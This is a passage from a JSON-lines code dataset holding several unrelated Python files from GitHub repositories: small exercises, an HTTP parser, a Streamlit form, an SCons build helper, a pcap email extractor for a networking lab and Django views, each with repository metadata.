файла\n","repo_name":"griinadiine/stepik_auto_tests_course","sub_path":"script234.py","file_name":"script234.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30896037328","text":"from random import randint\n\nkeepPlaying = \"y\"\n\nwhile(keepPlaying != \"n\"):\n\tanswer = randint(1, 11)\n\tcorrect = False\n\n\twhile(correct != True):\n\t\tguess = input(\"Guess a number between 1 and 10: \")\n\t\tguess = int(guess)\n\n\t\tif guess < answer:\n\t\t\tprint(\"Too low, try again!\")\n\t\telif guess > answer:\n\t\t\tprint(\"Too high, try again!\")\n\t\telse:\n\t\t\tprint(\"You guessed it! You won!\")\n\t\t\tcorrect = True\n\tkeepPlaying = input(\"Do you want to keep playing? 
(y/n)\")\nprint(\"Thanks for playing!\")","repo_name":"kcastillo23116/ModernPythonBootCamp","sub_path":"GuessingGame.py","file_name":"GuessingGame.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34313569420","text":"import json\nimport request\n\n\nPARSE_INCOMPLETE = 0\nPARSE_COMPLETE = 1\nPARSE_ERROR = 2\n\n\ndef parse_start_line(msg):\n [method, path, version] = msg.split(\" \")\n return (method, path, version)\n\ndef parse_header(str_header):\n headers = {}\n lines = str_header.split(\"\\r\\n\")\n for line in lines:\n [field, value] = line.split(\":\", 1)\n k = field.strip().lower()\n headers[k] = value.strip()\n return headers\n\ndef parse_http_header(header):\n [str_start_line, str_header] = header.split(\"\\r\\n\", 1)\n (method, path, version) = parse_start_line(str_start_line)\n headers = parse_header(str_header)\n req_info = {\n \"method\": method,\n \"path\": path,\n \"version\": version\n }\n return (True, {\"len\": len(header), \"req_info\": req_info, \"headers\": headers})\n\ndef parse_disposition(disp):\n items = disp.split(b\";\")\n disposition = items[0].strip()\n params = {}\n for opt in items[1:]:\n k, v = opt.split(b\"=\")\n params[k.strip().decode()] = v.strip().strip(b'\"').decode()\n return disposition, params\n\ndef parse_multipart_form_data(boundary, data, args):\n if boundary.startswith('\"') and boundary.endswith('\"'):\n boundary = boundary[1:-1]\n final_boundary_index = data.rfind(\"--\" + boundary + \"--\")\n if final_boundary_index == -1:\n return False\n parts = data[:final_boundary_index].split(\"--\" + boundary + \"\\r\\n\")\n for part in parts:\n if not part:\n continue\n eoh = part.find(\"\\r\\n\\r\\n\")\n if eoh == -1:\n continue\n headers = parse_header(part[:eoh])\n disp = headers.get(\"content-disposition\", \"\")\n disposition, disp_params = parse_disposition(disp)\n if disposition != \"form-data\" or not part.endswith(\"\\r\\n\"):\n continue\n value = part[eoh + 4 : -2]\n if value == 'undefined':\n value = None\n if not disp_params.get(\"name\"):\n continue\n name = disp_params[\"name\"]\n if disp_params.get(\"filename\"):\n if not name in args:\n args[name] = []\n ctype = headers.get(\"content-type\", \"application/unknown\")\n args[name].append({\n \"filename\": disp_params[\"filename\"],\n \"content\": value,\n \"type\": ctype\n })\n else:\n args[name] = value\n return True\n\ndef parse_request_body(headers, str_body):\n if not \"content-length\" in headers or not \"content-type\" in headers:\n return (False, PARSE_INCOMPLETE)\n\n body_len = int(headers[\"content-length\"])\n if len(str_body) != body_len:\n return (False, PARSE_INCOMPLETE)\n\n body = {}\n content_type = headers['content-type']\n if content_type.find(\"application/x-www-form-urlencoded\") != -1:\n items = str_body.split(\"&\")\n for item in items:\n [field, value] = item.split(\"=\")\n k = field.strip()\n body[k] = value.strip()\n return (True, {\"len\": body_len, \"body\": body})\n\n if content_type.find(\"multipart/form-data\") != -1:\n args = {}\n flag = True\n fields = content_type.split(\";\")\n for field in fields:\n k, sep, v = field.strip().partition(\"=\")\n if k != \"boundary\" or not v:\n continue\n flag = parse_multipart_form_data(v, str_body, args)\n if not flag:\n break\n if not flag:\n return (False, PARSE_INCOMPLETE)\n body = args\n return (True, {\"len\": body_len, \"body\": body})\n\n if content_type.find(\"application/json\") != -1:\n body = 
json.loads(str_body)\n return (True, {\"len\": body_len, \"body\": body})\n return (False, PARSE_INCOMPLETE)\n\ndef parse_http_message(msg):\n if msg.find(\"\\r\\n\\r\\n\") == -1:\n return (False, PARSE_INCOMPLETE)\n\n [header, body] = msg.split(\"\\r\\n\\r\\n\", 1)\n (result, header_info) = parse_http_header(header)\n if not result:\n return (False, PARSE_ERROR)\n\n req_info = header_info[\"req_info\"]\n header_len = header_info[\"len\"]\n headers = header_info[\"headers\"]\n (result, info) = parse_request_body(headers, body)\n\n if not result:\n return (False, info)\n\n body_len = info[\"len\"]\n req = request.Request(\n req_info[\"method\"],\n req_info[\"path\"],\n req_info[\"version\"],\n headers,\n info[\"body\"]\n )\n return (True, {\"len\": header_len + body_len + 4, \"request\": req})\n\n\ndef parse(conn):\n r = (result, info) = parse_http_message(conn.buffer)\n if not result:\n return r\n\n msg_len = info[\"len\"]\n conn.buffer = conn.buffer[msg_len:]\n return (True, info[\"request\"])\n","repo_name":"hejingsong/sge-service","sub_path":"example/pyhttp/src/pylib/http_parser.py","file_name":"http_parser.py","file_ext":"py","file_size_in_byte":4687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74580854652","text":"def main():\n n = int(input())\n a = list(map(int,input().split()))\n d = int(input())\n b = [0]*n\n if d%n==0:\n for i in a:\n print(i,end=\" \")\n else:\n d = d%n\n for i in range(n):\n x = i-d\n if x<0:\n x = n+x\n b[x] = a[i]\n for i in b:\n print(i,end=\" \")\n\nif __name__==\"__main__\":\n main()","repo_name":"kothariji/competitive-programming","sub_path":"Arrays/(HACKERRANK)LeftRotateArray.py","file_name":"(HACKERRANK)LeftRotateArray.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":612,"dataset":"github-code","pt":"78"} +{"seq_id":"14043163254","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 27 19:43:39 2023\n\n@author: Kusafqe\n\"\"\"\n\nnumero1 = int(input(\"Introduzca el primer número: \"))\nnumero2 = int(input(\"Introduzca el segundo número: \"))\n\nif numero1 % numero2 == 0:\n print(\"El número \", numero2, \"divide a \", numero1)\n \nelif numero2 % numero1 == 0:\n print(\"El número \", numero1, \"divide a \", numero2)\nelse:\n print(\"Ninguno es divisible por el otro\")\n ","repo_name":"Kusafqe/cursoIA","sub_path":"Módulo2/ejercicio2.py","file_name":"ejercicio2.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29970198646","text":"import streamlit as st\nimport datetime\nfrom functions import insert_into_table, display_time\n\nconn = st.session_state[\"conn\"]\n\nauthenticator = st.session_state[\"authenticator\"]\n\nif st.session_state[\"authentication_status\"]:\n authenticator.logout('Logout', 'main')\n with st.form(\"my_form\", clear_on_submit=True):\n employer_name = st.text_input(\"Name\", max_chars=255)\n employer_description = st.text_input(\"Description\", max_chars=255)\n start_date = st.date_input(\"start date\")\n wage = st.number_input(label=\"Wage\", format=\"%.2f\", min_value=0.00, max_value=100.00, step=0.01)\n submit_button = st.form_submit_button(label=\"Submit\")\n\n if submit_button:\n employer_id = insert_into_table(conn,\"employer\",\n [\"employer_name\",\"employer_description\"],\n [employer_name,employer_description])\n insert_into_table(conn,\"wage_history\",[\"employer_id\",\n \"start_date, wage\"],\n 
[employer_id,start_date,wage])\n st.success(\"Employer and wage information saved successfully.\")\nelse:\n st.warning('Please enter your username and password') ","repo_name":"JimCortes/Hours","sub_path":"pages/4_🔢_new_employer.py","file_name":"4_🔢_new_employer.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4100417470","text":"#!/usr/bin/python -t\n\n# linked list\n\n\"\"\"\nDefinition of ListNode\nclass ListNode(object):\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param head: the first Node\n @return: the answer after plus one\n \"\"\"\n def plusOne(self, head):\n # Write your code here\n if not head:\n return head\n \n r = self.reverse(head)\n \n self.addOne(r)\n \n return self.reverse(r)\n \n \n def reverse(self, head):\n prev = None\n while head:\n n = head.next\n head.next = prev\n prev = head\n head = n\n \n return prev\n \n def addOne(self, l):\n c = 1\n dummy = ListNode(0)\n dummy.next = l\n prev = dummy\n \n while l:\n val = l.val + c\n c = val/10\n val = val%10\n l.val = val\n l = l.next\n prev = prev.next\n \n if c:\n prev.next = ListNode(c)\n \n return\n \n","repo_name":"boknowswiki/mytraning","sub_path":"lintcode/python/0904_plus_one_linked_list.py","file_name":"0904_plus_one_linked_list.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"36515116592","text":"import os\n\n# Keep a global dictionary of library target params for lookups in\n# ExtendComponent().\n_all_lib_targets = {}\n\ndef _GenericLibrary(env, static, **kwargs):\n \"\"\"Extends ComponentLibrary to support multiplatform builds\n of dynamic or static libraries.\n\n Args:\n env: The environment object.\n kwargs: The keyword arguments.\n\n Returns:\n See swtoolkit ComponentLibrary\n \"\"\"\n params = CombineDicts(kwargs, {'COMPONENT_STATIC': static})\n return ExtendComponent(env, 'ComponentLibrary', **params)\n\n\ndef Library(env, **kwargs):\n \"\"\"Extends ComponentLibrary to support multiplatform builds of static\n libraries.\n\n Args:\n env: The current environment.\n kwargs: The keyword arguments.\n\n Returns:\n See swtoolkit ComponentLibrary\n \"\"\"\n return _GenericLibrary(env, True, **kwargs)\n\n\ndef DynamicLibrary(env, **kwargs):\n \"\"\"Extends ComponentLibrary to support multiplatform builds\n of dynmic libraries.\n\n Args:\n env: The environment object.\n kwargs: The keyword arguments.\n\n Returns:\n See swtoolkit ComponentLibrary\n \"\"\"\n return _GenericLibrary(env, False, **kwargs)\n\n\ndef Object(env, **kwargs):\n return ExtendComponent(env, 'ComponentObject', **kwargs)\n\n\ndef Unittest(env, **kwargs):\n \"\"\"Extends ComponentTestProgram to support unittest built\n for multiple platforms.\n\n Args:\n env: The current environment.\n kwargs: The keyword arguments.\n\n Returns:\n See swtoolkit ComponentProgram.\n \"\"\"\n kwargs['name'] = kwargs['name'] + '_unittest'\n\n common_test_params = {\n 'posix_cppdefines': ['GUNIT_NO_GOOGLE3', 'GTEST_HAS_RTTI=0'],\n 'libs': ['unittest_main', 'gunit']\n }\n if not kwargs.has_key('explicit_libs'):\n common_test_params['win_libs'] = [\n 'advapi32',\n 'crypt32',\n 'iphlpapi',\n 'secur32',\n 'shell32',\n 'shlwapi',\n 'user32',\n 'wininet',\n 'ws2_32'\n ]\n common_test_params['lin_libs'] = [\n 'crypto',\n 'pthread',\n 'ssl',\n ]\n\n params = CombineDicts(kwargs, common_test_params)\n 
return ExtendComponent(env, 'ComponentTestProgram', **params)\n\n\ndef App(env, **kwargs):\n \"\"\"Extends ComponentProgram to support executables with platform specific\n options.\n\n Args:\n env: The current environment.\n kwargs: The keyword arguments.\n\n Returns:\n See swtoolkit ComponentProgram.\n \"\"\"\n if not kwargs.has_key('explicit_libs'):\n common_app_params = {\n 'win_libs': [\n 'advapi32',\n 'crypt32',\n 'iphlpapi',\n 'secur32',\n 'shell32',\n 'shlwapi',\n 'user32',\n 'wininet',\n 'ws2_32'\n ]}\n params = CombineDicts(kwargs, common_app_params)\n else:\n params = kwargs\n return ExtendComponent(env, 'ComponentProgram', **params)\n\ndef WiX(env, **kwargs):\n \"\"\" Extends the WiX builder\n Args:\n env: The current environment.\n kwargs: The keyword arguments.\n\n Returns:\n The node produced by the environment's wix builder\n \"\"\"\n return ExtendComponent(env, 'WiX', **kwargs)\n\ndef Repository(env, at, path):\n \"\"\"Maps a directory external to $MAIN_DIR to the given path so that sources\n compiled from it end up in the correct place under $OBJ_DIR. NOT required\n when only referring to header files.\n\n Args:\n env: The current environment object.\n at: The 'mount point' within the current directory.\n path: Path to the actual directory.\n \"\"\"\n env.Dir(at).addRepository(env.Dir(path))\n\n\ndef Components(*paths):\n \"\"\"Completes the directory paths with the correct file\n names such that the directory/directory.scons name\n convention can be used.\n\n Args:\n paths: The paths to complete. If it refers to an existing\n file then it is ignored.\n\n Returns:\n The completed lif scons files that are needed to build talk.\n \"\"\"\n files = []\n for path in paths:\n if os.path.isfile(path):\n files.append(path)\n else:\n files.append(ExpandSconsPath(path))\n return files\n\n\ndef ExpandSconsPath(path):\n \"\"\"Expands a directory path into the path to the\n scons file that our build uses.\n Ex: magiflute/plugin/common => magicflute/plugin/common/common.scons\n\n Args:\n path: The directory path to expand.\n\n Returns:\n The expanded path.\n \"\"\"\n return '%s/%s.scons' % (path, os.path.basename(path))\n\n\ndef AddMediaLibs(env, **kwargs):\n lmi_libdir = '$GOOGLE3/../googleclient/third_party/lmi/files/lib/'\n if env.Bit('windows'):\n if env.get('COVERAGE_ENABLED'):\n lmi_libdir += 'win32/c_only'\n else:\n lmi_libdir += 'win32/Release'\n elif env.Bit('mac'):\n lmi_libdir += 'macos'\n elif env.Bit('linux'):\n lmi_libdir += 'linux/x86'\n\n\n AddToDict(kwargs, 'libdirs', [\n '$MAIN_DIR/third_party/gips/Libraries/',\n lmi_libdir,\n ])\n\n gips_lib = ''\n if env.Bit('windows'):\n if env.Bit('debug'):\n gips_lib = 'gipsvoiceenginelib_mtd'\n else:\n gips_lib = 'gipsvoiceenginelib_mt'\n elif env.Bit('mac'):\n gips_lib = 'VoiceEngine_mac_universal_gcc'\n elif env.Bit('linux'):\n gips_lib = 'VoiceEngine_Linux_gcc'\n\n\n AddToDict(kwargs, 'libs', [\n gips_lib,\n 'LmiAudioCommon',\n 'LmiClient',\n 'LmiCmcp',\n 'LmiDeviceManager',\n 'LmiH263ClientPlugIn',\n 'LmiH263CodecCommon',\n 'LmiH263Decoder',\n 'LmiH263Encoder',\n 'LmiH264ClientPlugIn',\n 'LmiH264CodecCommon',\n 'LmiH264Common',\n 'LmiH264Decoder',\n 'LmiH264Encoder',\n 'LmiIce',\n 'LmiMediaPayload',\n 'LmiOs',\n 'LmiPacketCache',\n 'LmiProtocolStack',\n 'LmiRateShaper',\n 'LmiRtp',\n 'LmiSecurity',\n 'LmiSignaling',\n 'LmiStun',\n 'LmiTransport',\n 'LmiUi',\n 'LmiUtils',\n 'LmiVideoCommon',\n 'LmiXml',\n ])\n\n if env.Bit('windows'):\n AddToDict(kwargs, 'libs', [\n 'dsound',\n 'd3d9',\n 'gdi32',\n 'strmiids',\n ])\n\n if 
env.Bit('mac'):\n AddToDict(kwargs, 'FRAMEWORKS', [\n 'AudioToolbox',\n 'AudioUnit',\n 'Cocoa',\n 'CoreAudio',\n 'CoreFoundation',\n 'IOKit',\n 'QTKit',\n 'QuickTime',\n 'QuartzCore',\n ])\n return kwargs\n\n\ndef ReadVersion(filename):\n \"\"\"Executes the supplied file and pulls out a version definition from it. \"\"\"\n defs = {}\n execfile(str(filename), defs)\n if not defs.has_key('version'):\n return '0.0.0.0'\n version = defs['version']\n parts = version.split(',')\n build = os.environ.get('GOOGLE_VERSION_BUILDNUMBER')\n if build:\n parts[-1] = str(build)\n return '.'.join(parts)\n\n\n#-------------------------------------------------------------------------------\n# Helper methods for translating talk.Foo() declarations in to manipulations of\n# environmuent construction variables, including parameter parsing and merging,\n#\ndef GetEntry(dict, key):\n \"\"\"Get the value from a dictionary by key. If the key\n isn't in the dictionary then None is returned. If it is in\n the dictionaruy the value is fetched and then is it removed\n from the dictionary.\n\n Args:\n key: The key to get the value for.\n kwargs: The keyword argument dictionary.\n Returns:\n The value or None if the key is missing.\n \"\"\"\n value = None\n if dict.has_key(key):\n value = dict[key]\n dict.pop(key)\n\n return value\n\n\ndef MergeAndFilterByPlatform(env, params):\n \"\"\"Take a dictionary of arguments to lists of values, and, depending on\n which platform we are targetting, merge the lists of associated keys.\n Merge by combining value lists like so:\n {win_foo = [a,b], lin_foo = [c,d], foo = [e], mac_bar = [f], bar = [g] }\n becomes {foo = [a,b,e], bar = [g]} on windows, and\n {foo = [e], bar = [f,g]} on mac\n\n Args:\n env: The hammer environment which knows which platforms are active\n params: The keyword argument dictionary.\n Returns:\n A new dictionary with the filtered and combined entries of params\n \"\"\"\n platforms = {\n 'linux': 'lin_',\n 'mac': 'mac_',\n 'posix': 'posix_',\n 'windows': 'win_',\n }\n active_prefixes = [\n platforms[x] for x in iter(platforms) if env.Bit(x)\n ]\n inactive_prefixes = [\n platforms[x] for x in iter(platforms) if not env.Bit(x)\n ]\n\n merged = {}\n for arg, values in params.iteritems():\n inactive_platform = False\n\n key = arg\n\n for prefix in active_prefixes:\n if arg.startswith(prefix):\n key = arg[len(prefix):]\n\n for prefix in inactive_prefixes:\n if arg.startswith(prefix):\n inactive_platform = True\n\n if inactive_platform:\n continue\n\n AddToDict(merged, key, values)\n\n return merged\n\n# Linux can build both 32 and 64 bit on 64 bit host, but 32 bit host can\n# only build 32 bit. For 32 bit debian installer a 32 bit host is required.\n# ChromeOS (linux) ebuild don't support 64 bit and requires 32 bit build only\n# for now.\ndef Allow64BitCompile(env):\n return (env.Bit('linux') and env.Bit('platform_arch_64bit')\n )\n\ndef MergeSettingsFromLibraryDependencies(env, params):\n if params.has_key('libs'):\n for lib in params['libs']:\n if (_all_lib_targets.has_key(lib) and\n _all_lib_targets[lib].has_key('dependent_target_settings')):\n params = CombineDicts(\n params,\n MergeAndFilterByPlatform(\n env,\n _all_lib_targets[lib]['dependent_target_settings']))\n return params\n\ndef ExtendComponent(env, component, **kwargs):\n \"\"\"A wrapper around a scons builder function that preprocesses and post-\n processes its inputs and outputs. 
For example, it merges and filters\n certain keyword arguments before appending them to the environments\n construction variables. It can build signed targets and 64bit copies\n of targets as well.\n\n Args:\n env: The hammer environment with which to build the target\n component: The environment's builder function, e.g. ComponentProgram\n kwargs: keyword arguments that are either merged, translated, and passed on\n to the call to component, or which control execution.\n TODO(): Document the fields, such as cppdefines->CPPDEFINES,\n prepend_includedirs, include_talk_media_libs, etc.\n Returns:\n The output node returned by the call to component, or a subsequent signed\n dependant node.\n \"\"\"\n env = env.Clone()\n\n # prune parameters intended for other platforms, then merge\n params = MergeAndFilterByPlatform(env, kwargs)\n\n # get the 'target' field\n name = GetEntry(params, 'name')\n\n # save pristine params of lib targets for future reference\n if 'ComponentLibrary' == component:\n _all_lib_targets[name] = dict(params)\n\n # add any dependent target settings from library dependencies\n params = MergeSettingsFromLibraryDependencies(env, params)\n\n # if this is a signed binary we need to make an unsigned version first\n signed = env.Bit('windows') and GetEntry(params, 'signed')\n if signed:\n name = 'unsigned_' + name\n\n # add default values\n if GetEntry(params, 'include_talk_media_libs'):\n params = AddMediaLibs(env, **params)\n\n # potentially exit now\n srcs = GetEntry(params, 'srcs')\n if not srcs or not hasattr(env, component):\n return None\n\n # apply any explicit dependencies\n dependencies = GetEntry(params, 'depends')\n if dependencies is not None:\n env.Depends(name, dependencies)\n\n # put the contents of params into the environment\n # some entries are renamed then appended, others renamed then prepended\n appends = {\n 'cppdefines' : 'CPPDEFINES',\n 'libdirs' : 'LIBPATH',\n 'link_flags' : 'LINKFLAGS',\n 'libs' : 'LIBS',\n 'FRAMEWORKS' : 'FRAMEWORKS',\n }\n prepends = {}\n if env.Bit('windows'):\n # MSVC compile flags have precedence at the beginning ...\n prepends['ccflags'] = 'CCFLAGS'\n else:\n # ... 
while GCC compile flags have precedence at the end\n appends['ccflags'] = 'CCFLAGS'\n if GetEntry(params, 'prepend_includedirs'):\n prepends['includedirs'] = 'CPPPATH'\n else:\n appends['includedirs'] = 'CPPPATH'\n\n for field, var in appends.items():\n values = GetEntry(params, field)\n if values is not None:\n env.Append(**{var : values})\n for field, var in prepends.items():\n values = GetEntry(params, field)\n if values is not None:\n env.Prepend(**{var : values})\n\n # workaround for pulse stripping link flag for unknown reason\n if Allow64BitCompile(env):\n env['SHLINKCOM'] = ('$SHLINK -o $TARGET -m32 $SHLINKFLAGS $SOURCES '\n '$_LIBDIRFLAGS $_LIBFLAGS')\n env['LINKCOM'] = ('$LINK -o $TARGET -m32 $LINKFLAGS $SOURCES '\n '$_LIBDIRFLAGS $_LIBFLAGS')\n\n # any other parameters are replaced without renaming\n for field, value in params.items():\n env.Replace(**{field : value})\n\n # invoke the builder function\n builder = getattr(env, component)\n\n node = builder(name, srcs)\n\n # make a parallel 64bit version if requested\n if Allow64BitCompile(env) and GetEntry(params, 'also64bit'):\n env_64bit = env.Clone()\n env_64bit.FilterOut(CCFLAGS = ['-m32'], LINKFLAGS = ['-m32'])\n env_64bit.Prepend(CCFLAGS = ['-m64', '-fPIC'], LINKFLAGS = ['-m64'])\n name_64bit = name + '64'\n env_64bit.Replace(OBJSUFFIX = '64' + env_64bit['OBJSUFFIX'])\n env_64bit.Replace(SHOBJSUFFIX = '64' + env_64bit['SHOBJSUFFIX'])\n if ('ComponentProgram' == component or\n ('ComponentLibrary' == component and\n env_64bit['COMPONENT_STATIC'] == False)):\n # link 64 bit versions of libraries\n libs = []\n for lib in env_64bit['LIBS']:\n if (_all_lib_targets.has_key(lib) and\n _all_lib_targets[lib].has_key('also64bit')):\n libs.append(lib + '64')\n else:\n libs.append(lib)\n env_64bit.Replace(LIBS = libs)\n\n env_64bit['SHLINKCOM'] = ('$SHLINK -o $TARGET -m64 $SHLINKFLAGS $SOURCES '\n '$_LIBDIRFLAGS $_LIBFLAGS')\n env_64bit['LINKCOM'] = ('$LINK -o $TARGET -m64 $LINKFLAGS $SOURCES '\n '$_LIBDIRFLAGS $_LIBFLAGS')\n builder = getattr(env_64bit, component)\n nodes = [node, builder(name_64bit, srcs)]\n return nodes\n\n if signed: # Note currently incompatible with 64Bit flag\n # Get the name of the built binary, then get the name of the final signed\n # version from it. We need the output path since we don't know the file\n # extension beforehand.\n target = node[0].path.split('_', 1)[1]\n signed_node = env.SignedBinary(\n source = node,\n target = '$STAGING_DIR/' + target,\n )\n env.Alias('signed_binaries', signed_node)\n return signed_node\n\n return node\n\n\ndef AddToDict(dictionary, key, values, append=True):\n \"\"\"Merge the given key value(s) pair into a dictionary. If it contains an\n entry with that key already, then combine by appending or prepending the\n values as directed. Otherwise, assign a new keyvalue pair.\n \"\"\"\n if values is None:\n return\n\n if not dictionary.has_key(key):\n dictionary[key] = values\n return\n\n cur = dictionary[key]\n # TODO: Make sure that there are no duplicates\n # in the list. 
I can't use python set for this since\n # the nodes that are returned by the SCONS builders\n # are not hashable.\n # dictionary[key] = list(set(cur).union(set(values)))\n if append:\n dictionary[key] = cur + values\n else:\n dictionary[key] = values + cur\n\n\ndef CombineDicts(a, b):\n \"\"\"Unions two dictionaries by combining values of keys shared between them.\n \"\"\"\n c = {}\n for key in a:\n if b.has_key(key):\n c[key] = a[key] + b.pop(key)\n else:\n c[key] = a[key]\n\n for key in b:\n c[key] = b[key]\n\n return c\n\n\ndef RenameKey(d, old, new, append=True):\n AddToDict(d, new, GetEntry(d, old), append)\n","repo_name":"CyFI-Lab-Public/RetroScope","sub_path":"external/chromium/third_party/libjingle/source/talk/site_scons/talk.py","file_name":"talk.py","file_ext":"py","file_size_in_byte":15485,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"78"} +{"seq_id":"31799939198","text":"import sys\nimport xml.etree.ElementTree as ET\nimport csv\nimport re\n\n# Xml parser\ntree = ET.parse(sys.argv[1])\nroot = tree.getroot() # returns a pointer to the first element of the tree\n\nn = 0\nsender = []\nreceiver = []\nsubject = []\nmessage = []\n\n# all the field tags are inside proto tags which are in packet tags. Hence we need to parse inside\nfor child in root:\n for gchild in child:\n # Number of emails = (Number of message packets with proto.showname = \"Internet Message Format\")\n if gchild.get('showname') == \"Internet Message Format\":\n for ggchild in gchild:\n if ggchild.get('name') == \"imf.subject\": # subject is contained in field tag with name = \"imf.subject\"\n subject.append(ggchild.get('showname')[9:]) # getting \n\n elif ggchild.get('name') == \"imf.message_text\": # body message is contained in a field tag which has a field tag as child with name = \"imf.message_text\"\n for field in ggchild:\n message.append(field.get('show'))\n\n n += 1\n\n if gchild.get('showname') == \"Simple Mail Transfer Protocol\": # search only those proto with showname = \"Simple Mail Transfer Protocol\"\n for ggchild in gchild:\n if ggchild.get('name') == \"smtp.command_line\":\n showname = ggchild.get('show')\n if \"FROM\" in showname: # sender email id contains \"from\" in showname\n sender.append(showname[11:-15])\n elif \"TO\" in showname: # receiver email id contains \"to\"\" in showname\n receiver.append(showname[9:-7])\n \n\n\nprint(\"Number of Emails transfered = \" + str(n))\n\nfor i in range(n):\n print()\n print(\"Email - \" + str(i+1))\n print(\"Sender email id - \" + str(sender[i]))\n print(\"Receiver email id - \" + str(receiver[i]))\n print(\"Subject - \" + subject[i])\n print(\"Message Body - \" + message[i])\n ","repo_name":"rohit1309d/Computer-Networks-Lab-CS39006","sub_path":"Lab Test/18CS10013_Q1/1_b.py","file_name":"1_b.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7984987222","text":"from ClaseNodo import Nodo\r\nclass Lista(object):\r\n __comienzo=None\r\n __actual=None\r\n __indice=0\r\n __tope=0\r\n def __init__(self):\r\n self.__comienzo=None\r\n self.__actual=None\r\n def __iter__(self):\r\n return self\r\n def __next__(self):\r\n if self.__indice==self.__tope:\r\n self.__actual=self.__comienzo\r\n self.__indice=0\r\n raise StopIteration\r\n else:\r\n self.__indice+=1\r\n dato = self.__actual.getDato()\r\n self.__actual=self.__actual.getSiguiente()\r\n return dato\r\n def listarDatosProfesores(self):\r\n 
aux=self.__comienzo\r\n while aux!=None:\r\n a=aux.getDato()\r\n a.mostrarDatos()\r\n aux=aux.getSiguiente()\r\n def insertarVehiculoPorCola(self,persona):\r\n unNodo= Nodo(persona)\r\n unNodo.setSiguiente(self.__comienzo)\r\n self.__comienzo=unNodo\r\n self.__actual=unNodo\r\n self.__tope+=1 #indica la cantidad de objetos\r\n def insertarVehiculoAlFinal(self,persona):\r\n unNodo=Nodo(persona)\r\n if(self.__comienzo==None): #si esta vacia hace una carga comun\r\n unNodo.setSiguiente(self.__comiezo)\r\n self.__comienzo=unNodo\r\n self.__actual=unNodo\r\n self.__tope+=1\r\n else:\r\n aux=self.__comienzo #resguardamos la cabeza\r\n while(aux.getSiguiente()!=None):\r\n aux=aux.getSiguiente()\r\n unNodo.setSiguiente(aux.getSiguiente()) #coloca None en el ultimo Nodo\r\n aux.setSiguiente(unNodo) #y el penultimo queda apuntando al ultimo\r\n self.__actual=unNodo\r\n self.__tope+=1\r\n def insertarVehiculoAdentro(self,persona,pos): #por posicion\r\n unNodo=Nodo(persona)\r\n con=1\r\n if(pos==1): #si desea colocarlo en la primer posicion\r\n unNodo.setSiguiente(self.__comienzo)\r\n self.__comienzo=unNodo\r\n self.__tope+=1\r\n else:\r\n aux=self.__comienzo\r\n while(con<(pos-1)):\r\n aux=aux.getSiguiente()\r\n con+=1\r\n unNodo.setSiguiente(aux.getSiguiente())\r\n aux.setSiguiente(unNodo)\r\n self.__tope+=1\r\n def eliminarPorEdad(self,edad):\r\n if(self.__comienzo.getEdad()==edad):\r\n aux=self.__comienzo\r\n self.__comienzo=self.__comienzo.getSiguiente()\r\n self.__tope-=1\r\n del aux\r\n else:\r\n aux=self.__comienzo\r\n while((aux!=None)&(aux.getEdad()!=edad)):\r\n ant=aux\r\n aux=aux.getSiguiente()\r\n ant.setSiguiente(aux.getSiguiente())\r\n self.__tope-=1\r\n del aux\r\n def encontrarObjeto(self,pos):\r\n if(pos==0):\r\n print(type(self.__comienzo.getDato()))\r\n else:\r\n cont=0\r\n aux=self.__comienzo\r\n while(cont= 150 or len(query) < 1:\n res = Product.objects.none()\n elif len(query.strip()) == 0:\n res = Product.objects.none()\n else:\n allprod = Product.objects.filter(item__icontains=query)\n allcatg = Category.objects.filter(title__icontains=query)\n if allcatg:\n pincatg = allcatg[0].get_products.all()\n res = allprod.union(pincatg)\n else:\n res = allprod\n\n # CART and LIKE\n in_cart = []\n already_liked = []\n if request.user.is_authenticated:\n cart = get_object_or_404(Cart, user=request.user).cart_entry.all()\n for p in res:\n cartp = cart.filter(product=p)\n if cartp:\n in_cart.append(p)\n if p.likes.filter(id=request.user.id).exists():\n already_liked.append(p)\n \n context = {\n 'res': res,\n 'in_cart': in_cart,\n \"already_liked\": already_liked\n }\n return render(request, 'ecom/search_results.html', context)\n\n\ndef contact_us(request):\n name = request.POST.get('fname')\n message = request.POST.get('message')\n email = request.POST.get('email')\n Contact.objects.create(name=name, message=message, email=email)\n return redirect(request.META['HTTP_REFERER']+'#footerCtf')\n\n\ndef product_details(request, id):\n product = Product.objects.get(id=id)\n in_cart = []\n already_liked = []\n if request.user.is_authenticated:\n cart = get_object_or_404(Cart, user=request.user).cart_entry.all()\n cartp = cart.filter(product=product)\n if cartp:\n in_cart.append(product)\n if product.likes.filter(id=request.user.id).exists():\n already_liked.append(product)\n\n # { \"size\":[ \"S\", \"M\", \"L\" ], \"crust\":[ \"cheese burst\", \"classic hand tossed\", \"thin crust\" ] }\n\n pdict2 = {}\n pot = product.options\n if pot != \"\":\n pdict2 = json.loads(pot)\n else:\n pdict2 = 
